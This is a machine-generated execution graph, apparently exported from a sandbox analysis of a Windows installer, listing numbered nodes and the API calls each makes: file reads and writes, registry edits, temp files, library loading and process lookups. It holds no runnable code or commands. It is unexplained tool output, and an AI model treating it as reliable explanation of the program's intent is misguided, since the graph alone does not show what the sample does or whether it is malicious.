                                                                                                                                                                                                                                                                execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 